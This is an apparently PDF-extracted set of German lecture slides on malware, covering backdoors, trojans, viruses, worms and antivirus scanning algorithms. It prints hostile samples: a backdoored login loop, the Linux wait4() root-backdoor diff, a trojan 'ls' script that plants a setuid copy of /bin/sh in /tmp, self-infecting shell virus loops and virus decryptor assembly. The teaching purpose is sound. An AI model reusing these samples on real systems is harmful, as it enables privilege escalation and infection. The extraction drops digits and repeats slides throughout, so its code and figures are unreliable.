Überblick. Vorlesung Informationssicherheit. Logische Bomben. Ausschnitt aus dem McAfee-Aktivierungskalender. Hintertüren (Back Doors) Logische Bomben
|
|
- Emilia Brinkerhoff
- vor 8 Jahren
- Abrufe
Transkript
1 Überblick Bösartige Software Vorlesung Informationssicherheit Thema 5: Bösartige Software Wirtsprogramm nötig unabhängig Robert Baumgartl Hintertüren Logische Bomben Viren Würmer Trojanische Pferde verbreiten sich selbständig Abbildung: Mögliche Kategorisierung bösartiger Software / 95 lokale vs. entfernte Angriffe on-line- vs. off-line-angriffe 2 / 95 Logische Bomben Ausschnitt aus dem McAfee-Aktivierungskalender Idee: Implantierung bösartigen Codes in Applikationen (oder in das BS), Aktivierung des Codes, sobald eine bestimmte Aktivierungsbedingung erfüllt Aktivierungsbedingung Eintritt eines Datums (logische) Zeitbombe (Kalender von Aktivierungsdaten: meist simples Löschen von Daten häufig eingesetzt, um Rache für Entlassung o. ä. zu üben 2. Mai W97M/Alamat, W97M/Yous, VBS/Horty.b@MM, VBS/Horty.a@MM, WM/Alliance.A, WM/Envader.A (Intended), WM/Eraser.A:Tw, VBS/Aqui 3. Mai VBS/Aqui, VBS/Zync, WM/Eraser.A:Tw, VBS/Alphae, WM/Envader.A (Intended), Twno.A, WM/BOOM.A;B, WM/BADBOY.A;B;C, WM/FRIDAY.D, WM/FRIDAY.A, WM/Goldsecret.B:Int,WM/CVCK.B;E, W97M/Rapmak.a, W97M/Yous, W97M/Alamat, WM/SHOWOFF.G, W97M/BackHand.A, W97M/Idea.A, W97M/Digma 4. Mai X97M/Jal.a, VBS/San@M, W97M/Este, W97M/Alamat, W32/SoftSix.worm, W97M/Yous, VBS/Valentin@MM, WM/PHARDERA.C ;D (INTENDED), W97M/Class.B, W97M/Class.D, W97M/Ekiam, WM/Eraser.A:Tw, VBS/Aqui 5. Mai... 3 / 95 4 / 95 Logische Bomben Hintertüren (Back Doors) Beispiel: Donald Gene Burleson, Programmierer für Versicherung USPA & IRA, Ft. Worth, TX entlassen am (Grund: persönliche Schwierigkeiten) am um 3 Uhr werden 68. Datensätze aus der Datenbank des Unternehmens gelöscht Code wurde bei Restaurierung der gelöschten Datensätze gefunden Vor Gericht: Benson, who spent four days testifying about how he uncovered the scheme, said the destructive programs were created Sept. 2 and Sept. 3, 985, on Burleson s computer terminal by someone using Burleson s computer password. ( 5 / 95 Idee: Einbau (nichtdokumentierter) Schnittstellen in Software zwecks späteren (unautorisierten) Zugriffes auf das System. Mißbrauch von geheimen Debugging-Schnittstellen schwierig von BS-Seite aus zu erkennen häufiges Relikt aus der Produktentwicklung Behörden sind häufig der Meinung, ein Anrecht auf Hintertüren zu haben Gegenmaßnahme: Code Reviews, Open Source symmetrische vs. asymmetrische Hintertüren viele Würmer installieren Back Doors Klassiker: Back Orifice ( feste Master-BIOS-Passworte, z. B. lkwpeter bei Award BIOS 6 / 95
2 Beispiel einer Hintertür Beispiel 2 (Backdoor im Linux-Kern; nice try) Beispiel: Login-Code mit Hintertür (Tanenbaum: Modern Operating Systems, 2, S. 6) while (TRUE) { printf("login: "); get_string(name); disable_echoing(); printf("password: "); get_string(password); enable_echoing(); v = check_validity(name, password); if (v strcmp(name, "zzzzz") == ) break; } execute_shell(name); From: Larry McVoy [ blocked] Subject: Re: BK2CVS problem Date: Wed, 5 Nov 23 4:23:2-8 On Wed, Nov 5, 23 at 2:58:3PM -8, Matthew Dharm wrote: > Out of curiosity, what were the changed lines? --- GOOD :46: BAD :46:53. -,6 schedule(); goto repeat; } + if ((options == ( WCLONE WALL)) && (current->uid = )) + retval = -EINVAL; retval = -ECHILD; end_wait4: current->state = TASK_RUNNING; --- Larry McVoy lm at bitmover.com 7 / 95 8 / 95 Beispiel 2 (Backdoor im Linux-Kern; nice try) Trojanische Pferde ( Trojaner ) jemand modifizierte die Kernelquellen (unautorisiert) fraglicher Code gehört zu sys_wait4(), d. h. dem Systemruf wait4() verkleideter Code ; (current->uid = ) sieht so ähnlich aus wie (current->uid == ) wenn jemand wait4() aufruft und die Optionen WCLONE und WALL sind gesetzt, so erhält der Rufende root-rechte Code wurde beim Review entdeckt ( It s not a big deal, we catch stuff like this, but it s annoying to the CVS users. ) Idee: dem Nutzer ein Programm unterschieben, welches bei Aktivierung unerlaubte Aktionen ausführt anstelle eines Eindringlings führt ein autorisierter Nutzer Schadcode aus Beispiel: gefälschter Login-Bildschirm Klassiker: Compiler, der unbemerkt bösartigen Code in übersetzte Programme einbaut (Ken Thompson: Reflections on Trusting Trust, CACM 4(27), S. 76ff.) vgl. Bundestrojaner 9 / 95 / 95 Beispiel eines simplen UNIX-Trojaners Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen / 95 2 / 95 2
3 Beispiel eines simplen UNIX-Trojaners Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen 3 / 95 4 / 95 Beispiel eines simplen UNIX-Trojaners (Computer)-Viren (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen A virus is a program that is able to infect other programs by modifying them to include a possibly evolved copy of itself. (Fred Cohen) einige Varianten: Stealth-Viren polymorphe Viren Bootsektor-Viren Macro-Viren 5 / 95 6 / 95 Beispiel für viralen (virulenten?) Code Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) 7 / 95 8 / 95 3
4 Beispiel für viralen (virulenten?) Code Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) 9 / 95 2 / 95 Beispiel für viralen (virulenten?) Code Ein (etwas) besserer Virus for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then HOST=$(echo -n $(tail - $i)) VIR=$(echo -n $(tail - $)) if [ "$HOST"!= "$VIR" ] then tail -n $ cat >> $i; fi fi done 2 / / 95 Würmer Komponenten eines Wurms An independently replicating and autonomous infection agent, capable of seeking out new host systems and infecting them via the network. (Jose Nazario: Defence and Detection Strategies against Internet Worms, Artech House, 24) Bekannte Vertreter: W32.Blaster Melissa Mydoom Sasser Conficker. Aufklärung neuer Hosts als potentielle Angriffsziele IP-Adreßräume (partiell) durchsuchen lokale Suche in (z. B.) Konfigurationsdateien OS Fingerprinting, um BS-Typ und -Version zu ermitteln 2. Angriffscode Remote Exploit bekannter Schwachstellen Trojanisches Pferd (z.b. Mail mit attached Binary) benötigt für jede anzugreifende Plattform Exploit 3. Kommunikation z. B. mittels ICMP, UDP,..., über verdeckte Kanäle Verbergen beteiligter Prozesse und Sockets mittels Kernelmodul oder durch Störung von Überwachungssoftware 23 / / 95 4
5 Komponenten eines Wurms Weitere Begriffe 4. Kommandoschnittstelle interaktiv oder indirekt (script-gesteuert) typische Kommandos: Up-/Download von Dateien, Flut-Ping, Generierung von HTTP-Requests, Verwaltung der erfolgreich angegriffenen Hosts verteilte oder zentralisierte Datenbank Liste aller befallenen Rechner in privatem IRC-Channel Ransomware (kryptografisch sichere) Verschlüsselung des Massenspeichers Entschlüsselung nur nach Zahlung eines Lösegelds z. B. TROJ_PGPCODER.A Rootkit Software, die zur Verschleierung der Kompromittierung eines Rechners dient Spyware Keylogger Hoax (z. B. Good-Times- Virus ) 25 / / 95 GoodTimes FYI, a file, going under the name "Good Times" is being sent to some Internet users who subscribe to on-line services (Compuserve, Prodigy and America On Line). If you should receive this file, do not download it! Delete it immediately. I understand that there is a virus included in that file, which if downloaded to your personal computer, will ruin all of your files. [...] Computerviren 27 / / 95 Literatur Was ist ein Virus? Eric Filiol: Computer Viruses: From Theory to Appliactions. Springer, 25 Peter Szor: The Art of Computer Virus Research and Defense. Addison-Wesley, 25 Mark Ludwig: The Giant Black Book of Computer Viruses. American Eagle Publications, 995 John Aycock: Computer Viruses and Malware. Springer, Definition A virus is a program that reproduces its own code by attaching itself to other executable files in such a way that the virus code is executed when the infected executable file is executed. Anmerkungen: Implementationssprache irrelevant keine Schadroutine nötig Wurm ist auch ein Virus 29 / 95 3 / 95 5
6 Bestandteile eines Virus Analyse: Blackwolf-Virus in C Infektionsmechanismus: Aufsuchen von Zielen, Replikation Routine(n) zum Verbergen: vor dem Nutzer oder Anti-Viren-Software Trigger: Entscheidung, ob bzw. wann Nutzlast aktiviert wird Nutzlast: zufälliger oder beabsichtigter Schaden oder Spaß Beispiel: blackwolf.c ( sucht alle.com-dateien im aktuellen Verzeichnis und infizierte diese (auf einmal) schnelle Infektion überschreibender Virus mäßig destruktiv: Virus-Code überschreibt Anfang der Ziele verbirgt sich nicht keine Nutzlast infiziert bei jeder Aktivierung, Ziele wachsen nicht, da überschreibend 3 / / 95 Klassifizierung von Viren I nach dem potentiellen Ziel Klassifizierung von Viren II nach der Strategie des Verbergens Boot-Sektor (allgemeine) ausführbare Dateien (.BAT,.EXE,.VBS, PostScript, ELF,.sh,.py,... ) (spezielle) Dateien bestimmter Applikationen, die mit Makrosprache ausgerüstet sind, z. B. Microsoft Office Makroviren (data file infectors) keine verschlüsselnd (besser: obfuscating) Stealth: Virus versucht, sich sowie die Infektion zu verbergen Oligomorphismus: Virus kommt in (endlich) vielen Formen vor Polymorphismus: Virus kommt in (fast) unendlich vielen Formen vor Metamorphismus: Virus wechselt seine Gestalt 33 / / 95 Klassifizierung von Viren III nach der Schadfunktion (Nutzlast, Payload) Nichtdestruktive Schadfunktion von W95/Marburg. keine Schadfunktion typisch für Proof-of-Concept-Viren trotzdem nicht harmlos (Ressourcenverbrauch, Datenverlust infolge Absturzes,... ) 2. unbeabsichtigte Schadfunktion ( aus Versehen ) Beispiel: Stoned-Virus schreibt Boot-Sektor an einen (vermeintlich) sicheren Platz, Ende des Wurzelverzeichnisses Verzeichniseinträge werden überschrieben, falls sehr viele Dateien im Root-Verzeichnis 3. nichtdestruktive Schadfunktion Yankee Doodle Cascade (Herbstlaub) W95/Marburg: zeichnet 256 Icons (IDI_HAND) zufällig auf den Bildschirm ( ) 35 / / 95 6
7 Klassifizierung von Viren III nach der Schadfunktion (Nutzlast, Payload) 4. mäßig destruktive Schadfunktion ( mildly damaging ) Löschen z. B. von Anti-Viren Software aus Speicher und von Festplatte W95/HPS kehrt samstags unkomprimierte BMP-Bilder um (von rechts nach links) WM/Wazzu.A (996), bewegt -3 Wörter in einem Office-Dokument, fügt ab und zu das Wort Wazzu ein 5. stark destruktive Schadfunktion a) schnelles Überschreiben von Daten Michelangelo: überschreibt erste 7 Sektoren jeder Spur der Köpfe bis 4 des Bootmediums Überschreiben des MBR oder der FAT (Töltögetö-Virus) AntiPascal: löscht Pascal-Quellfiles (.PAS) Stark destruktive Schadfunktionen b) langsames Überschreiben von Daten (Data Diddler) Dark.Avenger.8.A: schreibt "Eddie lives... somewhere in time!" in zufälligen Sektor Ripper: tauscht 2 Datenworte in einem zufällig gewählten Sektor der Festplatte aus Gefahr, daß manipulierte Daten ins Backup wandern c) Datenverschlüsselung Disk Killer: XORt alle Sektoren des Datenträgers KOH: verschlüsselt Datenträger mittels IDEA (Idee: Datenschutz!), guter Virus!? d Störung der Hardware AntiCMOS: beschreibt CMOS-RAM (setzt CMOS-Passwort) W95/CIH: überschreibt (u. a.) Teile des BIOS im Flash-Speicher 37 / / 95 Mehrfachinfektion Überschreibender Virus Header Header Mehrfachinfektion muß vermieden werden, da diese zu unbeabsichtigtem Fehlverhalten und auffälligem Wachstum infizierter Dateien führen, was die Detektierung erleichtert. Virus muß infizierte von nichtinfizierten Dateien unterscheiden können Wenn ein Virus dies kann, so kann dies (potentiell) auch Anti-Viren-Software! Code Virus Infektion Header Code und Daten Code überschriebener Teil der Zieldatei nichtüberschrieben ausführbare Zieldatei Abbildung: Prinzip des überschreibenden Virus 39 / 95 4 / 95 Überschreibender Virus Anhangvirus (Appender/Prepender) Virus Größe des Ziels ändert sich nicht auch ohne Payload bösartig: Überschreiben führt zu Nichtausführbarkeit des Ziels auch Überschreiben am Ende möglich (Sprung zum Virus und danach zum Wirtsprogramm) Virus muß sehr klein sein Zieldatei Infektion 2.. infizierte Zieldatei Aufrufreihenfolge Abbildung: Prinzip des sich anhängenden Virus 4 / / 95 7
8 Anhangvirus Companion Virus (Begleiter) Append: kleiner Teil des Targets wird mit Sprung zum Virus überschrieben während Ausführung des Virus muss Zieldatei wieder restauriert werden Auch Voranstellen des Virus möglich, aber ungleich schwieriger Größe der Zieldatei ändert sich Idee: Anlegen einer zusätzlichen Datei ( Begleiter ), die mit Zieldatei (logisch) verbunden ist wenn Zieldatei ausgeführt wird, wird zunächst stets der Begleiter, der Virus, ausgeführt Integrität des Zieles bleibt erhalten, jedoch entstehen neue Dateien 43 / / 95 Companion Virus Exec. 2. Virus Virus Infektion Zieldatei Zieldatei infizierte Zieldatei Abbildung: Prinzip des Companion Virus Companion Virus Implementierungstechniken Nutzung einer Ausführungspräzedenz (z. B. MS-DOS: file.com > file.exe > file.bat) Nutzung der Hierarchie beim Suchen ausführbarer Dateien Datei gleichen Namens wie das Ziel in ein Verzeichnis schreiben, das im PATH vor dem Verzeichnis des Zieles steht Manipulation der Indexstruktur der Zieldatei Überschreiben der Startclusternummer des Zieles mit Startclusternummer des Virus (und entsprechende Verkettung) Umbenennung des Zieles Virus kopiert sich, benennt sich wie Ziel, und ruft dieses nach eigener Aktivität betriebssystemunabhängig 45 / / 95 Quellcode-Virus Autoreplizierende Programme Idee: Manipulation von Quellcode: Einfügen virulenten Codes Vorteil: infizierte Binärdateien sind vollständig intakt vgl. Ken Thompson: Reflections on Trusting Trust. CACM 4(27) 984, S. 76ff. Gegenmaßnahmen: Code Review Integritätsprüfungen von Quelldateien Definition (Quine) Ein Quine ist ein Programm, das seinen eigenen Quellcode ausgibt. ziemlich schwierig für compilierte Sprachen zu schreiben (probieren Sie es!) nicht so schwierig für interpretierte Sprachen Beispiel in C: char f ="char f=%c%s%c ; main ( ) { printf ( f,34, f,34,) \ ;}% c " ; main ( ) { p r i n t f ( f,34, f,34,) ; } Literatur: david/computers/quine.html 47 / / 95 8
9 Ein Quine in L A T E X Quines in UNIX-Shell \documentclass{book}\pagestyle {empty}\def\a{\ensuremath{\backslash}}\def\f {\def\b{\a}\def\c{\{}\def\d{\}}\def \e{\\}\noindent\g\b def\b g\c\def\b{\a b }\def\c{\a c }\def\d{\a d}\def\e{\a e \\}\g\}\a begin\{document\}\a f\a end \{document\}}\def\g{ \b documentclass\c book\d\b pagestyle\e \c empty\d\b def\b a\c \b ensuremath\c \b backslash\d\d\b def\b f\e \c \b def\b b\c \b a\d\b def\b c\c \b \c \d\b def\b d\c \b \d\d\b def\e \b e\c \b \b \d\b noindent\b g\b b def\b b g\b c\b def\b b\c \b a b\e \d\b def\b c\c \b a c \d\b def\b d\c \b a d\d\b def\b e\c \b a e\e \b \b \d\b g\b \d\b a begin\b \c document\b \d\b a f\b a end\e \b \c document\b \d\d}\begin{document}\f\end{document} Beispiel : #!/bin/bash read foo<< EOF ;eval $foo echo #!/bin/bash ;echo read foo<< " EOF " ;eval $foo \ ;echo $foo;echo EOF EOF Beispiel 2: #!/bin/bash cat $ 49 / 95 5 / 95 Funktionsweise eines Quellcode-Virus Quellcode-Virus manipuliert. Virus kreiert Quellcodefile (virus.h), 2 Komponenten: Code des Virus (, der in Zieldatei eingebunden und übersetzt wird zu infiziertem Binärfile) gleicher Code in Form einer Datenstruktur (z. B. Array) für weitere Generationen des Virus = Quine 2. Infektion eines Zieles: #include "virus.h" Einfügen mindestens eines Aufrufs des Viruscode in Ziel 3. Virus selbst kann Übersetzungslauf der infizierten Quelle veranlassen Virus aktiver Virus (Binärcode) Zieldatei (Quellcode) Übersetzung infizierte Zieldatei (Binärcode) manipuliert manipuliert Zieldatei Zieldatei Abbildung: Prinzip eines Quellcode-Virus 5 / / 95 Boot-Viren Residente Viren 3 Typen BIOS-Virus manipuliert BIOS im Flash-Speicher kann nicht durch Antivirus-Software detektiert werden unterliegt keinen Zugriffsrestriktionen bei Festplatte Beispiel: W95/CIH Boot-Sektor- bzw. MBR-Virus infiziert genau einen Sektor maximale Größe 52 Byte nachladender Boot-Sektor-Virus verbleiben nach Aktivierung im Speicher Infektionsgeschwindigkeit muss künstlich gedrosselt werden MS-DOS: Terminate and Stay Resident (TSR) Windows: VXD (virtueller Gerätetreiber) UNIX: relativ schwierig als Daemon (root-privileg erforderlich) als Hintergrundprozess, gestartet durch.profile Ymum2 53 / / 95 9
10 Verschlüsselung Ein einfacher Decryptor für.exe-dateien Ziel: Erschweren von Reverse Engineering Detektierung Identifikation des genauen Virustyps Entschlüsselung muss schnell gehen! darf keine Nutzereingaben o. ä. erwarten XOR-Verschlüsselung gern genutzt: benötigt eine Maschineninstruktion Schlüssel für Ver- und Entschlüsselung gleich DECRYPT: mov si, OFFSET START mov di, OFFSET START mov cx, VIR_SIZE ELP: lodsb xor al,93h stosb loop ELP START: Virus Body Starts here... lodsb load byte at DS:SI into AL stosb store AL into DS:DI loop <label> dec CX, jump <label>, if CX 55 / / 95 Der Decryptor des Herbstlaub-Virus Variationen des Themas lea si,start mov sp,682 DECRYPT: xor [si],si xor [si],sp inc si dec sp jnz DECRYPT START:... erster bekannter verschlüsselnder Virus START ist Beginn des verschlüsselten Teils, dynamisch gesetzt SP als Zähler missbraucht einfachste Form: lineare Verschlüsselung (Byte nach Byte), vorwärts Verschlüsselung rückwärts (Decryptor steht am Ende des Virus) mehrere verschachtelte Entschlüsselungsschleifen semizufällige Auswahl des zu entschlüsselnden Bytes 57 / / 95 Formen von Entschlüsselungsschleifen Anmerkungen Decryption Loop Decryption Loop Virus Body Virus Body Decryption Loop n Virus Body Bitmuster der Entschlüsselungsschleife reicht manchmal zur Detektierung eines Virus, da diese Funktionen eigentlich nur in Viren vorkommen präzise Identifikation oft unmöglich, da weniger Typen von Entschlüsselungsschleifen als Virentypen Verschlüsselung Basis für Vielgestaltigkeit Decryption Loop Decryption Loop 2 59 / 95 6 / 95
11 Beispiel für oligomorphen Decryptor Erkennen Sie, was dieser Code tut? DECRYPT: xor [esi],al inc esi inc al dec ecx jnz DECRYPT jmp START START:... Beispiel aus W95/Memorial sliding decryption key 2 (leicht) verschiedene Schleifen DECRYPT: xor [esi],al inc esi inc al loop DECRYPT jmp START START:... inc si mov ax,e9b clc mov di,2a mov cx,57 LABEL: xor [di],cx sub bx,dx xor bx,cx sub bx,ax sub bx,cx xor dx,cx xor [di],ax inc di clc inc ax loop LABEL START: 6 / / 95 Es ist ein Dekryptor. Beispiel für polymorphen Virus: 26 inc si mov ax,e9b clc mov di,2a mov cx,57 LABEL: xor [di],cx sub bx,dx xor bx,cx sub bx,ax sub bx,cx xor dx,cx xor [di],ax inc di clc inc ax loop LABEL START: Einfügen sogenannter junk instructions verkompliziert Code Instruktionen in Prolog und Schleife können jeweils miteinander permutiert werden 2 Register mit Schlüsseln, ax und cx jedes Wort wird doppelt verschlüsselt beide Schlüssel ändern sich stetig (cx implizit durch loop) di zeigt auf zu verschlüsselndes Wort einer der ersten echt polymorphen Viren Polymorphe Viren können eine unübersehbare Vielzahl von Dekryptor-Routinen besitzen. 63 / / 95 Weitere Aspekte polymorpher Viren langsame Polymorphie: Gestalt des Virus ändert sich in großen Zeiträumen schlecht zu testen für AV-Software Mutation Engines: übernehmen einen unverschlüsselten Virus und generieren einen polymorphen Decryptor dafür (Beispiel: The Dark Avenger Mutation Engine) Metamorphe Viren: anstatt des Dekryptors wird der Körper des Virus modifiziert (keine Verschlüsselung mehr nötig) Weitere Techniken Code Interlacing (Hole Cavity Infection); im Portable Executable (PE) - Binärformat Armoured Virus: be- oder verhindert die Analyse des Binärcodes erkennen, wenn im Debugmodus abgearbeitet (beendet sich selbst, blockiert Tastatur, rebootet) Fake Code kryptographische Techniken Retrovirus: Nutzen spezifische Erkennungsschwächen von Anti-Virus-Software Multiformatvirus kann verschiedene Dateitypen infizieren (z. B. iwinux/lindose, infiziert PE und ELF) Slow vs. Rapid Virus Manipulation des Environments kooperierende oder kombinierte Viren 65 / / 95
12 Anti-Virus-Software Scanner Zielstellung: Erkennung keine False Positives keine False Negatives Identifikation, Entfernung von Viren Scanner: Programm zur Identifikation und Eliminierung bzw. Reparatur infizierter Dateien on-demand durch den Nutzer gerufen bzw. zu ausgezeichneten Zeitpunkten (Systemstart) on-access resident bei jedem Zugriff, Öffnen, Schließen z. B. als Filter-Dateisystem-Treiber unter Windows Problem: Netzwerk-Freigaben 67 / / 95 Signatur eines Virus Definition (Signatur eines Virus) Die Signatur eines Virus ist eine endliche Sequenz von Bytes, die einen bestimmten Virus eineindeutig identifiziert Beispiel: 4 B8 2E 7BB 2 33C9 8BD 49C identifiziert den Stoned-Virus Länge der Signatur? Wildcards? durchsucht werden alle anfälligen Dateien/Festplattenbereiche Problem: Performance! Algorithmus von Aho-Corasick (975) Zur bibliografischen Suche other hi hip hips h i 3 p 5 s 8 c t hit hi chip,hip 2 h 4 i 7 p 9 Abbildung: Beispiel eines Zustandsautomaten Fehlerzustand Folgezustand 3 5 Tabelle: Zugehörige Fehlerfunktion 6 69 / 95 7 / 95 Algorithmus von Aho-Corasick (975) Input Vorher Nachher Ausgabe s c 2 h 2 4 i 4 7 hi p 7 9 chip, hip h 9 i 3 hi Tabelle: Beispiel parallele Suche nach allen eingebauten Mustern findet auch überlappende Muster Anwendung z. B. in fgrep und snort Literatur: Alfred V. Aho, Margaret J. Corasick: Efficient string matching: An aid to bibliographic search. Communications of the ACM 8(6): / 95 Algorithmus von Veldman Idee: Repräsentation der Signaturen durch kurze (z. B. 4 Byte) charakteristische Sequenzen, Filterung mittels zweier Hashtabellen wenn erste beide Bytes in Hashtabelle zu finden sind, wird in 2 Hashtabelle nach Bytes 3 und 4 gesucht Treffer verlinkt verkettete Liste mit Signaturen, die dann sequentiell durchsucht werden 2-Byte-Sequenzen für kurze Signaturen ebenfalls möglich ideal für Suche mittels Wildcards Beispielzeichenkette für Automat: blar fo gree blar?g foo greep greed agreed 72 / 95 2
13 Algorithmus von Veldman Algorithmus von Veldman Suchfunktion: foreach byte sequence bb2b3b4 in input: if HT[bb2] == then if two-byte-pattern then signatures = HT[bb2]->ST match(signatures) else if HT2[b3b4] == then signatures = HT2[b3b4]->ST match(signatures) Hash Table HT aa ab ac bl fo gr Hash Table 2 HT2 aa ab ac ar ee Signature Table ST bla?r greep foo green Abbildung: Beteiligte Datenstrukturen (Beispiel) agreed 73 / / 95 Algorithmus von Veldman Algorithmus von Wu und Manber Anmerkungen: inexakte Filterung: im Beispiel würden z. B. bleed oder grar als gültige Signatur erkannt werden folgendes Matching schliesst diese aber wieder aus match-operation der Signaturen erfolgt sequentiell Idee: Verbesserung von Veldman, irrelevante Bytes in der Eingabe überspringen erlaubt ebenfalls Wildcards Anwendung: agrep (unscharfe Suche) Literatur: Udi Manber, Sun Wu: Fast text search allowing errors. Communications of the ACM, 35(), October / / 95 Algorithmus von Wu und Manber Suchfunktion i = MINLEN while i < n: shift = SHIFT [b[i-],b[i]] if shift = : signatures = HASH[b[i-],b[i]] match(signatures) shift = i = i + shift MINLEN minimale Länge der Mustersubstrings (foo, greed,... ) b[i] Bytes der zu durchsuchenden Zeichenkette ( i < n) SHIFT Anzahl Bytes, die übersprungen werden können HASH Hashtabelle für Signaturen Algorithmus von Wu und Manber Shift Table SHIFT ab ag bl fo gr la oo re xx 2 2 Hash Table 2 HASH gr la oo re agreed bla?r foo greep Abbildung: Beteiligte Datenstrukturen (Beispiel) green 77 / / 95 3
14 Algorithmus von Wu und Manber Beispieleingabe Algorithmus von Wu und Manber Konstruktion der Datenstrukturen MINLEN=3 Leserichtung b[] b[] b[2] b[3] b[4] b[5] b[6] b[7] c a b x x f o o. Ermittlung von MINLEN 2. Initialisierung von SHIFT mit MINLEN- 3. Füllen von SHIFT SHIFT[xy] = MINLEN - q xy q xy : maximale rechte Endposition von xy in allen betreffenden Pattern, gezählt ab initiale Shift: +2 Shift: +2 Position Aufgabe: Was passiert mit der Eingabe cabxloo? Shift: + Match Beispiel: xy Signatur q xy bl bla 2 la bla 3 gr agr,gre 3 4. Konstruktion der Hashes, wenn SHIFT[xy] == 79 / 95 8 / 95 Probleme von Signaturen Scanning: Leistungssteigerung zu kurz: zu viele false positives Fehlidentifikation von Virentypen zu lang: aufgeblähte Datenbank langsame Suche Virusvarianten nicht als solche erkannt generell: ständiges Update der Signaturdatenbank nötig zeitliche Lücke zwischen Auftreten eines neuen Virus Erkennung des Virus Analyse des Virus und Generierung einer Signatur Reduktion der zu durchmusternden Daten: nicht komplette Dateien durchsuchen (Top- and Tail-Scanning) Start des Scans am Einsprungpunkt der Applikation Fixed Point Scanning: wenn exakte Position der Signatur (innerhalb des Virus) bekannt ist nur soviel durchmustern, wie der gesucht Virus lang ist Reduktion der Scan-Durchläufe: nur befallbare Dateien durchmustern (ausführbare, Dokumente) Ergebnisse früherer Scans speichern, nur erneut scannen, wenn Datei modifiziert wurde (Erkennung der Modifikation? Checksummen? Integritätssicherung der Datenbank) 8 / / 95 Exakte Identifikation Beispiel: Stoned-Virus Idee: Alle konstanten Teile eines Virus ermitteln (Map). Checksumme (z. B. CRC) über Map Voraussetzungen: Virus vollständig analysiert und verstanden Variablen identifiziert, Länge des Virus ermittelt. Variablen: seg :7c bodyzero : seg :7 c jmp f a r p t r 7ch :5 seg :7 c5 jmp s t a r t seg :7 c5 ; seg :7 c8 f l a g db ; ; hard d isk or d i s k e t t e? seg :7 c9 i n t 3 o f f dw 25h ; DATA XREF seg :7 cb int3seg dw c8h ; DATA XREF seg :7 cd j u m p s t a r t dw e4h ; o f f s e t to make seg :7 cd ; i n t e r segment jump seg :7 cf virusseg dw 9f8h ; DATA XREF seg :7 c b o o t o f f dw 7ch ; to boot seg :7 c3 botseg dw ; segment seg :7 c5 ; seg :7 c5 push ds seg :7 c6 push ax Anfang des Stoned-Virus, nach [Szor5] 83 / / 95 4
15 Beispiel: Stoned-Virus Identifikation von Varianten 2. Länge des Virus: seg :7 cd3 mov cs, B8h ; 44 bytes seg :7 cd6 push cs seg :7 cd7 pop ds seg :7cd8 xor si, si ; copy code to memory seg :7cda mov di, si seg :7 cdc c l d seg :7 cdd rep movsb seg :7 cdf jmp dword p t r cs : dh Kopierroutine, nach [Szor5] Map des Virus: x x7, xd xe, x-x87 Virus Name: Stoned.A Virus Map: x-x7 xd-xe x-xb7 Checksum: x3523d929 :8 333DBFECCD3EB C57596F Your P : E6F F6E65642 C is now Stoned! :A 7DAA4C C D4...LEGALISE MA :B 52494A5544E42 RIJUANA!... Ausschnitt aus Stoned.A Virus Name: Stoned.B Virus Map: x-x7 xd-xe x-xb7 Checksum: x3523c769 :8 333DBFECCD3EB C57596F Your P : E6F F6E65642 C is now stoned! :A 7DAA4C C495A454D4...LEGALIZE.MA :B 52494A5544E42 RIJUANA!... Ausschnitt aus Stoned.B 85 / / 95 Probleme mit polymorphen Viren Nutzung von statischen Heuristiken MOV AX, 65A XCHG DX, AX MOV AX, DX MOV BP, AX ADD EBP, 69BDAA5F MOV BX, BP XCHG BL, DH MOV BL, BYTE PTR DS:[43A5] XCHG BL, DH CMP BYTE PTR GS:[B975], DH SUB DH, BYTE PTR DS:[63] MOV AH, DH INT 2 Problem: welchen Wert haben AH und BX bei Aufruf des Interrupts? nur durch Emulator zu ermitteln. Grundidee: Identifikation von Merkmalen, die Viren von anderer Software unterscheiden, Suche nach diesen Merkmalen in Dateien, Addition und Wichtung gefundener 